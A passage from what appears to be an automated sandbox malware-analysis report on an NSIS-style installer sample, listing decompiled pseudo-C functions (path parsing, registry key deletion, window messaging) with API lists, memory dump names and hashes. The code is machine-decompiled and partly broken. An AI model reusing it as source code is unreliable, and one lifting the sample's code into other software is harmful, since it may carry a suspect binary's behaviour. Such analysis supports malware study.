							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002C20(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((short*)(_t43 + 2)) - 0x26;
					if( *((short*)(_t43 + 2)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}



























                                                        0x100018a9
                                                        0x100018b3
                                                        0x100018bc
                                                        0x100018bf
                                                        0x100018c4
                                                        0x100018cd
                                                        0x100018d6
                                                        0x100018d8
                                                        0x100018da
                                                        0x100018df
                                                        0x100018e2
                                                        0x100018e9
                                                        0x100018f7
                                                        0x10001900
                                                        0x10001905
                                                        0x10001908
                                                        0x1000190e
                                                        0x1000190e
                                                        0x10001911
                                                        0x10001914
                                                        0x10001917
                                                        0x100019df
                                                        0x100019df
                                                        0x100019e2
                                                        0x10001a4d
                                                        0x10001a52
                                                        0x10001a61
                                                        0x10001a64
                                                        0x10001a6c
                                                        0x10001a6c
                                                        0x10001a6c
                                                        0x10001a6e
                                                        0x10001a6e
                                                        0x10001a6f
                                                        0x10001a6f
                                                        0x10001a71
                                                        0x10001a71
                                                        0x10001a73
                                                        0x10001a79
                                                        0x10001a82
                                                        0x10001a93
                                                        0x10001a9e
                                                        0x10001a9e
                                                        0x10001a66
                                                        0x10001a48
                                                        0x10001a48
                                                        0x10001a4a
                                                        0x10001a4a
                                                        0x00000000
                                                        0x10001a4a
                                                        0x10001a68
                                                        0x10001a6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a6a
                                                        0x10001a56
                                                        0x10001a5a
                                                        0x00000000
                                                        0x10001a5a
                                                        0x100019e4
                                                        0x100019e4
                                                        0x100019e5
                                                        0x10001a3f
                                                        0x10001a41
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a43
                                                        0x10001a46
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a46
                                                        0x100019e7
                                                        0x100019e7
                                                        0x100019e8
                                                        0x10001a1e
                                                        0x10001a23
                                                        0x10001a32
                                                        0x10001a35
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a37
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a39
                                                        0x10001a3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a3d
                                                        0x10001a27
                                                        0x10001a2b
                                                        0x00000000
                                                        0x10001a2b
                                                        0x100019ea
                                                        0x100019ea
                                                        0x100019ed
                                                        0x10001a17
                                                        0x10001a19
                                                        0x00000000
                                                        0x10001a19
                                                        0x100019ef
                                                        0x100019ef
                                                        0x100019f2
                                                        0x100019fe
                                                        0x10001a03
                                                        0x10001a10
                                                        0x10001a12
                                                        0x00000000
                                                        0x10001a12
                                                        0x10001a05
                                                        0x10001a07
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a09
                                                        0x10001a0c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a0e
                                                        0x100019f5
                                                        0x100019f6
                                                        0x100019f8
                                                        0x100019fa
                                                        0x100019fa
                                                        0x00000000
                                                        0x100019f6
                                                        0x1000191d
                                                        0x10001996
                                                        0x10001998
                                                        0x1000199b
                                                        0x100019b7
                                                        0x100019ba
                                                        0x100019c5
                                                        0x100019c7
                                                        0x1000199d
                                                        0x1000199d
                                                        0x100019a1
                                                        0x100019a5
                                                        0x100019a5
                                                        0x100019ca
                                                        0x100019ce
                                                        0x00000000
                                                        0x100019d4
                                                        0x100019d4
                                                        0x100019d7
                                                        0x00000000
                                                        0x100019d7
                                                        0x100019ce
                                                        0x1000191f
                                                        0x10001922
                                                        0x10001987
                                                        0x10001989
                                                        0x1000198b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001991
                                                        0x10001924
                                                        0x10001927
                                                        0x00000000
                                                        0x00000000
                                                        0x10001929
                                                        0x1000192a
                                                        0x10001960
                                                        0x10001965
                                                        0x1000197d
                                                        0x1000197f
                                                        0x00000000
                                                        0x1000197f
                                                        0x10001967
                                                        0x10001969
                                                        0x00000000
                                                        0x00000000
                                                        0x1000196f
                                                        0x10001972
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001978
                                                        0x1000192c
                                                        0x1000192f
                                                        0x10001956
                                                        0x00000000
                                                        0x10001931
                                                        0x10001931
                                                        0x10001932
                                                        0x10001946
                                                        0x10001948
                                                        0x10001934
                                                        0x10001936
                                                        0x1000193c
                                                        0x1000193e
                                                        0x1000193e
                                                        0x10001936
                                                        0x00000000
                                                        0x10001932

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                        • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                        • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                        • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                        0x00401d63
                                                        0x00401d6a
                                                        0x00401d99
                                                        0x00401da1
                                                        0x00401da8
                                                        0x00401da8
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 00401D5D
                                                        • GetClientRect.USER32 ref: 00401D6A
                                                        • LoadImageW.USER32 ref: 00401D8B
                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                        • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                        • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                        • Opcode Fuzzy Hash: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                        • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406193();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                        0x00401c19
                                                        0x00401c1b
                                                        0x00401c22
                                                        0x00401c25
                                                        0x00401c28
                                                        0x00401c32
                                                        0x00401c36
                                                        0x00401c39
                                                        0x00401c42
                                                        0x00401c42
                                                        0x00401c45
                                                        0x00401c49
                                                        0x00401c52
                                                        0x00401c52
                                                        0x00401c55
                                                        0x00401c59
                                                        0x00401c5b
                                                        0x00401cb0
                                                        0x00401cb2
                                                        0x00401cbd
                                                        0x00401cc7
                                                        0x00401cca
                                                        0x00401cca
                                                        0x00401cd3
                                                        0x00000000
                                                        0x00401c5d
                                                        0x00401c64
                                                        0x00401c66
                                                        0x00401c69
                                                        0x00401c6f
                                                        0x00401c76
                                                        0x00401c79
                                                        0x00401ca1
                                                        0x00401cd9
                                                        0x00401cd9
                                                        0x00401c7b
                                                        0x00401c89
                                                        0x00401c91
                                                        0x00401c94
                                                        0x00401c94
                                                        0x00401c79
                                                        0x00401cdc
                                                        0x00401cdf
                                                        0x00401ce5
                                                        0x00402a65
                                                        0x00402a65
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SendMessageTimeoutW.USER32 ref: 00401C89
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                        • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                        • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                        • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405BC8(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B4A(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                        0x00405bd1
                                                        0x00405bd8
                                                        0x00405bdb
                                                        0x00405bdd
                                                        0x00405be3
                                                        0x00405bfb
                                                        0x00405c1d
                                                        0x00000000
                                                        0x00405c03
                                                        0x00405c05
                                                        0x00405c06
                                                        0x00405c09
                                                        0x00405c0a
                                                        0x00405c13
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c16
                                                        0x00405c19
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c19
                                                        0x00000000
                                                        0x00405c06
                                                        0x00405bf2
                                                        0x00000000
                                                        0x00405bf3

                                                        APIs
                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405BD6
                                                        • CharNextW.USER32(00000000), ref: 00405BDB
                                                        • CharNextW.USER32(00000000), ref: 00405BF3
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsr743A.tmp, xrefs: 00405BC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr743A.tmp
                                                        • API String ID: 3213498283-3880677739
                                                        • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                        • Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
                                                        • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                        • Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00405B1D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                        0x00405b1e
                                                        0x00405b2b
                                                        0x00405b2c
                                                        0x00405b37
                                                        0x00405b3f
                                                        0x00405b3f
                                                        0x00405b47

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-823278215
                                                        • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                        • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                        • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                        • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060B9(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406626(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











                                                        0x00402d35
                                                        0x00402d3e
                                                        0x00402d47
                                                        0x00402d53
                                                        0x00402d5a
                                                        0x00402d7e
                                                        0x00402d64
                                                        0x00402d66
                                                        0x00402db9
                                                        0x00000000
                                                        0x00402dc1
                                                        0x00402d75
                                                        0x00402d7a
                                                        0x00402d7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00402d7c
                                                        0x00402d98
                                                        0x00402da0
                                                        0x00402da7
                                                        0x00000000
                                                        0x00402dca
                                                        0x00000000
                                                        0x00402db2
                                                        0x00402dd4

                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Close$Enum
                                                        • String ID:
                                                        • API String ID: 464197530-0
                                                        • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                        • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                        • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                        • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402E5D(intOrPtr _a4) {
				long _t2;
